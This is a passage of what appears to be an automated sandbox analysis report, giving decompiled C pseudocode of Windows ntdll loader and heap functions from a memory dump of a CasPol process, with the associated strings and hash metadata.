                                                                							L6:
                                                                							if(E0163934A() != 0) {
                                                                								_t159 = E016AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                								__eflags = _t159;
                                                                								if(_t159 < 0) {
                                                                									_t81 =  *0x1715780; // 0x0
                                                                									__eflags = _t81 & 0x00000003;
                                                                									if((_t81 & 0x00000003) != 0) {
                                                                										_push(_t159);
                                                                										E016A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                										_t81 =  *0x1715780; // 0x0
                                                                									}
                                                                									__eflags = _t81 & 0x00000010;
                                                                									if((_t81 & 0x00000010) != 0) {
                                                                										asm("int3");
                                                                									}
                                                                								}
                                                                							}
                                                                						} else {
                                                                							_t159 = E0163849B(0, _t122, _t153, _t159, _t180);
                                                                							if(_t159 >= 0) {
                                                                								goto L6;
                                                                							}
                                                                						}
                                                                						_t80 = _t159;
                                                                						goto L8;
                                                                					} else {
                                                                						_t125 = 0x13;
                                                                						asm("int 0x29");
                                                                						_push(0);
                                                                						_push(_t159);
                                                                						_t161 = _t125;
                                                                						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                						_t143 = 0;
                                                                						_v40 = _t161;
                                                                						_t118 = 0;
                                                                						_push(_t153);
                                                                						__eflags = _t87;
                                                                						if(_t87 != 0) {
                                                                							_t118 = _t87 + 0x5d8;
                                                                							__eflags = _t118;
                                                                							if(_t118 == 0) {
                                                                								L46:
                                                                								_t118 = 0;
                                                                							} else {
                                                                								__eflags =  *(_t118 + 0x30);
                                                                								if( *(_t118 + 0x30) == 0) {
                                                                									goto L46;
                                                                								}
                                                                							}
                                                                						}
                                                                						_v32 = 0;
                                                                						_v28 = 0;
                                                                						_v16 = 0;
                                                                						_v20 = 0;
                                                                						_v12 = 0;
                                                                						__eflags = _t118;
                                                                						if(_t118 != 0) {
                                                                							__eflags = _t161;
                                                                							if(_t161 != 0) {
                                                                								__eflags =  *(_t118 + 8);
                                                                								if( *(_t118 + 8) == 0) {
                                                                									L22:
                                                                									_t143 = 1;
                                                                									__eflags = 1;
                                                                								} else {
                                                                									_t19 = _t118 + 0x40; // 0x40
                                                                									_t156 = _t19;
                                                                									E01638999(_t19,  &_v16);
                                                                									__eflags = _v0;
                                                                									if(_v0 != 0) {
                                                                										__eflags = _v0 - 1;
                                                                										if(_v0 != 1) {
                                                                											goto L22;
                                                                										} else {
                                                                											_t128 =  *(_t161 + 0x64);
                                                                											__eflags =  *(_t161 + 0x64);
                                                                											if( *(_t161 + 0x64) == 0) {
                                                                												goto L22;
                                                                											} else {
                                                                												E01638999(_t128,  &_v12);
                                                                												_t147 = _v12;
                                                                												_t91 = 0;
                                                                												__eflags = 0;
                                                                												_t129 =  *_t147;
                                                                												while(1) {
                                                                													__eflags =  *((intOrPtr*)(0x1715c60 + _t91 * 8)) - _t129;
                                                                													if( *((intOrPtr*)(0x1715c60 + _t91 * 8)) == _t129) {
                                                                														break;
                                                                													}
                                                                													_t91 = _t91 + 1;
                                                                													__eflags = _t91 - 5;
                                                                													if(_t91 < 5) {
                                                                														continue;
                                                                													} else {
                                                                														_t131 = 0;
                                                                														__eflags = 0;
                                                                													}
                                                                													L37:
                                                                													__eflags = _t131;
                                                                													if(_t131 != 0) {
                                                                														goto L22;
                                                                													} else {
                                                                														__eflags = _v16 - _t147;
                                                                														if(_v16 != _t147) {
                                                                															goto L22;
                                                                														} else {
                                                                															E01642280(_t92, 0x17186cc);
                                                                															_t94 = E016F9DFB( &_v20);
                                                                															__eflags = _t94 - 1;
                                                                															if(_t94 != 1) {
                                                                															}
                                                                															asm("movsd");
                                                                															asm("movsd");
                                                                															asm("movsd");
                                                                															asm("movsd");
                                                                															 *_t118 =  *_t118 + 1;
                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                															_t95 = E016561A0( &_v32);
                                                                															__eflags = _t95;
                                                                															if(_t95 != 0) {
                                                                																__eflags = _v32 | _v28;
                                                                																if((_v32 | _v28) != 0) {
                                                                																	_t71 = _t118 + 0x40; // 0x3f
                                                                																	_t134 = _t71;
                                                                																	goto L55;
                                                                																}
                                                                															}
                                                                															goto L30;
                                                                														}
                                                                													}
                                                                													goto L56;
                                                                												}
                                                                												_t92 = 0x1715c64 + _t91 * 8;
                                                                												asm("lock xadd [eax], ecx");
                                                                												_t131 = (_t129 | 0xffffffff) - 1;
                                                                												goto L37;
                                                                											}
                                                                										}
                                                                										goto L56;
                                                                									} else {
                                                                										_t143 = E01638A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                										__eflags = _t143;
                                                                										if(_t143 != 0) {
                                                                											_t157 = _v12;
                                                                											_t103 = 0;
                                                                											__eflags = 0;
                                                                											_t136 =  &(_t157[1]);
                                                                											 *(_t161 + 0x64) = _t136;
                                                                											_t151 =  *_t157;
                                                                											_v20 = _t136;
                                                                											while(1) {
                                                                												__eflags =  *((intOrPtr*)(0x1715c60 + _t103 * 8)) - _t151;
                                                                												if( *((intOrPtr*)(0x1715c60 + _t103 * 8)) == _t151) {
                                                                													break;
                                                                												}
                                                                												_t103 = _t103 + 1;
                                                                												__eflags = _t103 - 5;
                                                                												if(_t103 < 5) {
                                                                													continue;
                                                                												}
                                                                												L21:
                                                                												_t105 = E0166F380(_t136, 0x1601184, 0x10);
                                                                												__eflags = _t105;
                                                                												if(_t105 != 0) {
                                                                													__eflags =  *_t157 -  *_v16;
                                                                													if( *_t157 >=  *_v16) {
                                                                														goto L22;
                                                                													} else {
                                                                														asm("cdq");
                                                                														_t166 = _t157[5] & 0x0000ffff;
                                                                														_t108 = _t157[5] & 0x0000ffff;
                                                                														asm("cdq");
                                                                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                														if(__eflags > 0) {
                                                                															L29:
                                                                															E01642280(_t108, 0x17186cc);
                                                                															 *_t118 =  *_t118 + 1;
                                                                															_t42 = _t118 + 0x40; // 0x3f
                                                                															_t156 = _t42;
                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                															asm("movsd");
                                                                															asm("movsd");
                                                                															asm("movsd");
                                                                															asm("movsd");
                                                                															_t110 = E016561A0( &_v32);
                                                                															__eflags = _t110;
                                                                															if(_t110 != 0) {
                                                                																__eflags = _v32 | _v28;
                                                                																if((_v32 | _v28) != 0) {
                                                                																	_t134 = _v20;
                                                                																	L55:
                                                                																	E016F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                																}
                                                                															}
                                                                															L30:
                                                                															 *_t118 =  *_t118 + 1;
                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                															E0163FFB0(_t118, _t156, 0x17186cc);
                                                                															goto L22;
                                                                														} else {
                                                                															if(__eflags < 0) {
                                                                																goto L22;
                                                                															} else {
                                                                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                																	goto L22;
                                                                																} else {
                                                                																	goto L29;
                                                                																}
                                                                															}
                                                                														}
                                                                													}
                                                                													goto L56;
                                                                												}
                                                                												goto L22;
                                                                											}
                                                                											asm("lock inc dword [eax]");
                                                                											goto L21;
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                						return _t143;
                                                                					}
                                                                				} else {
                                                                					_push( &_v8);
                                                                					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                					_push(__ecx + 0x40);
                                                                					_push(_t121);
                                                                					_push(0xffffffff);
                                                                					_t80 = E01669A00();
                                                                					_t159 = _t80;
                                                                					if(_t159 < 0) {
                                                                						L8:
                                                                						return _t80;
                                                                					} else {
                                                                						goto L2;
                                                                					}
                                                                				}
                                                                				L56:
                                                                			}


                                                                Strings
                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01689C28
                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01689C18
                                                                • LdrpDoPostSnapWork, xrefs: 01689C1E
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                • API String ID: 2994545307-1948996284
                                                                • Opcode ID: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                                                                • Instruction ID: 542b62845ac682c51002d892b4db49df887dba626b8e675b289206334d860df1
                                                                • Opcode Fuzzy Hash: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                                                                • Instruction Fuzzy Hash: 3491E171A002169FEB29DF5DDC81ABAB7BAFFC4314B55426DE905AB241D730AE01CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 80%
                                                                			E0165AC7B(void* __ecx, signed short* __edx) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				void* __ebx;
                                                                				signed char _t75;
                                                                				signed int _t79;
                                                                				signed int _t88;
                                                                				intOrPtr _t89;
                                                                				signed int _t96;
                                                                				signed char* _t97;
                                                                				intOrPtr _t98;
                                                                				signed int _t101;
                                                                				signed char* _t102;
                                                                				intOrPtr _t103;
                                                                				signed int _t105;
                                                                				signed char* _t106;
                                                                				signed int _t131;
                                                                				signed int _t138;
                                                                				void* _t149;
                                                                				signed short* _t150;
                                                                
                                                                				_t150 = __edx;
                                                                				_t149 = __ecx;
                                                                				_t70 =  *__edx & 0x0000ffff;
                                                                				__edx[1] = __edx[1] & 0x000000f8;
                                                                				__edx[3] = 0;
                                                                				_v8 =  *__edx & 0x0000ffff;
                                                                				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                                                					_t39 =  &(_t150[8]); // 0x8
                                                                					E0167D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                                                					__edx[1] = __edx[1] | 0x00000004;
                                                                				}
                                                                				_t75 =  *(_t149 + 0xcc) ^  *0x1718a68;
                                                                				if(_t75 != 0) {
                                                                					L4:
                                                                					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                                						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                                                						_t79 =  *(_t149 + 0x50);
                                                                						 *_t150 =  *_t150 ^ _t79;
                                                                						return _t79;
                                                                					}
                                                                					return _t75;
                                                                				} else {
                                                                					_t9 =  &(_t150[0x80f]); // 0x1017
                                                                					_t138 = _t9 & 0xfffff000;
                                                                					_t10 =  &(_t150[0x14]); // 0x20
                                                                					_v12 = _t138;
                                                                					if(_t138 == _t10) {
                                                                						_t138 = _t138 + 0x1000;
                                                                						_v12 = _t138;
                                                                					}
                                                                					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                                                					if(_t75 > _t138) {
                                                                						_v8 = _t75 - _t138;
                                                                						_push(0x4000);
                                                                						_push( &_v8);
                                                                						_push( &_v12);
                                                                						_push(0xffffffff);
                                                                						_t131 = E016696E0();
                                                                						__eflags = _t131 - 0xc0000045;
                                                                						if(_t131 == 0xc0000045) {
                                                                							_t88 = E016D3C60(_v12, _v8);
                                                                							__eflags = _t88;
                                                                							if(_t88 != 0) {
                                                                								_push(0x4000);
                                                                								_push( &_v8);
                                                                								_push( &_v12);
                                                                								_push(0xffffffff);
                                                                								_t131 = E016696E0();
                                                                							}
                                                                						}
                                                                						_t89 =  *[fs:0x30];
                                                                						__eflags = _t131;
                                                                						if(_t131 < 0) {
                                                                							__eflags =  *(_t89 + 0xc);
                                                                							if( *(_t89 + 0xc) == 0) {
                                                                								_push("HEAP: ");
                                                                								E0162B150();
                                                                							} else {
                                                                								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                							}
                                                                							_push(_v8);
                                                                							_push(_v12);
                                                                							_push(_t149);
                                                                							_t75 = E0162B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                                                							goto L4;
                                                                						} else {
                                                                							_t96 =  *(_t89 + 0x50);
                                                                							_t132 = 0x7ffe0380;
                                                                							__eflags = _t96;
                                                                							if(_t96 != 0) {
                                                                								__eflags =  *_t96;
                                                                								if( *_t96 == 0) {
                                                                									goto L10;
                                                                								}
                                                                								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                								L11:
                                                                								__eflags =  *_t97;
                                                                								if( *_t97 != 0) {
                                                                									_t98 =  *[fs:0x30];
                                                                									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                                                									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                                                										E016E14FB(_t132, _t149, _v12, _v8, 7);
                                                                									}
                                                                								}
                                                                								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                                                								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                                                								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                                                								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                                                								_t101 =  *( *[fs:0x30] + 0x50);
                                                                								__eflags = _t101;
                                                                								if(_t101 != 0) {
                                                                									__eflags =  *_t101;
                                                                									if( *_t101 == 0) {
                                                                										goto L13;
                                                                									}
                                                                									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                									goto L14;
                                                                								} else {
                                                                									L13:
                                                                									_t102 = _t132;
                                                                									L14:
                                                                									__eflags =  *_t102;
                                                                									if( *_t102 != 0) {
                                                                										_t103 =  *[fs:0x30];
                                                                										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                                                										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                                                											__eflags = E01647D50();
                                                                											if(__eflags != 0) {
                                                                												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                											}
                                                                											E016E1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                                                										}
                                                                									}
                                                                									_t133 = 0x7ffe038a;
                                                                									_t105 =  *( *[fs:0x30] + 0x50);
                                                                									__eflags = _t105;
                                                                									if(_t105 != 0) {
                                                                										__eflags =  *_t105;
                                                                										if( *_t105 == 0) {
                                                                											goto L16;
                                                                										}
                                                                										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                										goto L17;
                                                                									} else {
                                                                										L16:
                                                                										_t106 = _t133;
                                                                										L17:
                                                                										__eflags =  *_t106;
                                                                										if( *_t106 != 0) {
                                                                											__eflags = E01647D50();
                                                                											if(__eflags != 0) {
                                                                												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                											}
                                                                											E016E1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                                                										}
                                                                										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                                                										_t150[1] = _t75;
                                                                										goto L4;
                                                                									}
                                                                								}
                                                                							}
                                                                							L10:
                                                                							_t97 = _t132;
                                                                							goto L11;
                                                                						}
                                                                					} else {
                                                                						goto L4;
                                                                					}
                                                                				}
                                                                			}


                                                                Strings
                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0169A0CD
                                                                • HEAP[%wZ]: , xrefs: 0169A0AD
                                                                • HEAP: , xrefs: 0169A0BA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                • API String ID: 0-1340214556
                                                                • Opcode ID: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                                                                • Instruction ID: 902e2d581f73721d2451329116085639bfbee978e78a3118188295a23d8caecc
                                                                • Opcode Fuzzy Hash: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                                                                • Instruction Fuzzy Hash: 50810632204684EFEB26DBACCD94BA9BBF8FF05314F1442A9E95187392D774E940CB10
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 74%
                                                                			E0164B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                                                				signed int _v8;
                                                                				char _v12;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __ebp;
                                                                				void* _t72;
                                                                				char _t76;
                                                                				signed char _t77;
                                                                				intOrPtr* _t80;
                                                                				unsigned int _t85;
                                                                				signed int* _t86;
                                                                				signed int _t88;
                                                                				signed char _t89;
                                                                				intOrPtr _t90;
                                                                				intOrPtr _t101;
                                                                				intOrPtr* _t111;
                                                                				void* _t117;
                                                                				intOrPtr* _t118;
                                                                				signed int _t120;
                                                                				signed char _t121;
                                                                				intOrPtr* _t123;
                                                                				signed int _t126;
                                                                				intOrPtr _t136;
                                                                				signed int _t139;
                                                                				void* _t140;
                                                                				signed int _t141;
                                                                				void* _t147;
                                                                
                                                                				_t111 = _a4;
                                                                				_t140 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t3 = _t111 + 0x18; // 0x0
                                                                				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                                                				_t5 = _t111 - 8; // -32
                                                                				_t141 = _t5;
                                                                				 *(_t111 + 0x14) = _a8;
                                                                				_t72 = 4;
                                                                				 *(_t141 + 2) = 1;
                                                                				 *_t141 = _t72;
                                                                				 *((char*)(_t141 + 7)) = 3;
                                                                				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                                                				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                                                					_t76 = (_t141 - __edx >> 0x10) + 1;
                                                                					_v12 = _t76;
                                                                					__eflags = _t76 - 0xfe;
                                                                					if(_t76 >= 0xfe) {
                                                                						_push(__edx);
                                                                						_push(0);
                                                                						E016EA80D(_t134, 3, _t141, __edx);
                                                                						_t76 = _v12;
                                                                					}
                                                                				} else {
                                                                					_t76 = 0;
                                                                				}
                                                                				 *((char*)(_t141 + 6)) = _t76;
                                                                				if( *0x1718748 >= 1) {
                                                                					__eflags = _a12 - _t141;
                                                                					if(_a12 <= _t141) {
                                                                						goto L4;
                                                                					}
                                                                					_t101 =  *[fs:0x30];
                                                                					__eflags =  *(_t101 + 0xc);
                                                                					if( *(_t101 + 0xc) == 0) {
                                                                						_push("HEAP: ");
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                                                					E0162B150();
                                                                					__eflags =  *0x1717bc8;
                                                                					if(__eflags == 0) {
                                                                						E016E2073(_t111, 1, _t140, __eflags);
                                                                					}
                                                                					goto L3;
                                                                				} else {
                                                                					L3:
                                                                					_t147 = _a12 - _t141;
                                                                					L4:
                                                                					if(_t147 != 0) {
                                                                						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                                                					}
                                                                					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                                                						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                                                						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                                                					}
                                                                					_t135 =  *(_t111 + 0x14);
                                                                					if( *(_t111 + 0x14) == 0) {
                                                                						L12:
                                                                						_t77 =  *((intOrPtr*)(_t141 + 6));
                                                                						if(_t77 != 0) {
                                                                							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                                                						} else {
                                                                							_t117 = _t140;
                                                                						}
                                                                						_t118 = _t117 + 0x38;
                                                                						_t26 = _t111 + 8; // -16
                                                                						_t80 = _t26;
                                                                						_t136 =  *_t118;
                                                                						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                                                							_push(_t118);
                                                                							_push(0);
                                                                							E016EA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                                                						} else {
                                                                							 *_t80 = _t136;
                                                                							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                                                							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                                                							 *_t118 = _t80;
                                                                						}
                                                                						_t120 = _v8;
                                                                						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                                                						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                                                						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                                                						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                                                						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                                                							__eflags =  *(_t140 + 0xb8);
                                                                							if( *(_t140 + 0xb8) == 0) {
                                                                								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                                                								__eflags = _t88 - 2;
                                                                								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                                                								__eflags =  *0x1718720 & 0x00000001;
                                                                								_t89 = _t88 & 0xffffff00 | ( *0x1718720 & 0x00000001) == 0x00000000;
                                                                								__eflags = _t89 & _t121;
                                                                								if((_t89 & _t121) != 0) {
                                                                									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                                                								}
                                                                							}
                                                                						}
                                                                						_t85 =  *(_t111 + 0x14);
                                                                						if(_t85 >= 0x7f000) {
                                                                							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                                                						}
                                                                						_t86 = _a16;
                                                                						 *_t86 = _t141 - _a12 >> 3;
                                                                						return _t86;
                                                                					} else {
                                                                						_t90 = E0164B8E4(_t135);
                                                                						_t123 =  *((intOrPtr*)(_t90 + 4));
                                                                						if( *_t123 != _t90) {
                                                                							_push(_t123);
                                                                							_push( *_t123);
                                                                							E016EA80D(0, 0xd, _t90, 0);
                                                                						} else {
                                                                							 *_t111 = _t90;
                                                                							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                                                							 *_t123 = _t111;
                                                                							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                                                						}
                                                                						_t139 =  *(_t140 + 0xb8);
                                                                						if(_t139 != 0) {
                                                                							_t93 =  *(_t111 + 0x14) >> 0xc;
                                                                							__eflags = _t93;
                                                                							while(1) {
                                                                								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                                                								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                                                									break;
                                                                								}
                                                                								_t126 =  *_t139;
                                                                								__eflags = _t126;
                                                                								if(_t126 != 0) {
                                                                									_t139 = _t126;
                                                                									continue;
                                                                								}
                                                                								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                								break;
                                                                							}
                                                                							E0164E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                                                						}
                                                                						goto L12;
                                                                					}
                                                                				}
                                                                			}































                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-1334570610
                                                                • Opcode ID: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                                                                • Instruction ID: 6042d5601a79bb971b9eff710753697e2ada9c3e60dfea9785d8f0e11434b3a5
                                                                • Opcode Fuzzy Hash: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                                                                • Instruction Fuzzy Hash: E661B270600241DFEB29DF28CC85B6ABBE6FF44314F19856DE8498B346D770E892CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 98%
                                                                			E01637E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				char _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				char _v24;
                                                                				signed int _t73;
                                                                				void* _t77;
                                                                				char* _t82;
                                                                				char* _t87;
                                                                				signed char* _t97;
                                                                				signed char _t102;
                                                                				intOrPtr _t107;
                                                                				signed char* _t108;
                                                                				intOrPtr _t112;
                                                                				intOrPtr _t124;
                                                                				intOrPtr _t125;
                                                                				intOrPtr _t126;
                                                                
                                                                				_t107 = __edx;
                                                                				_v12 = __ecx;
                                                                				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                				_t124 = 0;
                                                                				_v20 = __edx;
                                                                				if(E0163CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                					_t112 = _v8;
                                                                				} else {
                                                                					_t112 = 0;
                                                                					_v8 = 0;
                                                                				}
                                                                				if(_t112 != 0) {
                                                                					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                						_t124 = 0xc000007b;
                                                                						goto L8;
                                                                					}
                                                                					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                					 *(_t125 + 0x34) = _t73;
                                                                					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                						goto L3;
                                                                					}
                                                                					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                					_t124 = E0162C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                					if(_t124 < 0) {
                                                                						goto L8;
                                                                					} else {
                                                                						goto L3;
                                                                					}
                                                                				} else {
                                                                					L3:
                                                                					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                						L8:
                                                                						return _t124;
                                                                					}
                                                                					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                							goto L5;
                                                                						}
                                                                						_t102 =  *0x1715780; // 0x0
                                                                						if((_t102 & 0x00000003) != 0) {
                                                                							E016A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                							_t102 =  *0x1715780; // 0x0
                                                                						}
                                                                						if((_t102 & 0x00000010) != 0) {
                                                                							asm("int3");
                                                                						}
                                                                						_t124 = 0xc0000428;
                                                                						goto L8;
                                                                					}
                                                                					L5:
                                                                					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                						goto L8;
                                                                					}
                                                                					_t77 = _a4 - 0x40000003;
                                                                					if(_t77 == 0 || _t77 == 0x33) {
                                                                						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                						if(E01647D50() != 0) {
                                                                							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                						} else {
                                                                							_t82 = 0x7ffe0384;
                                                                						}
                                                                						_t108 = 0x7ffe0385;
                                                                						if( *_t82 != 0) {
                                                                							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                								if(E01647D50() == 0) {
                                                                									_t97 = 0x7ffe0385;
                                                                								} else {
                                                                									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                								}
                                                                								if(( *_t97 & 0x00000020) != 0) {
                                                                									E016A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                								}
                                                                							}
                                                                						}
                                                                						if(_a4 != 0x40000003) {
                                                                							L14:
                                                                							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                							if(E01647D50() != 0) {
                                                                								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                							} else {
                                                                								_t87 = 0x7ffe0384;
                                                                							}
                                                                							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                								if(E01647D50() != 0) {
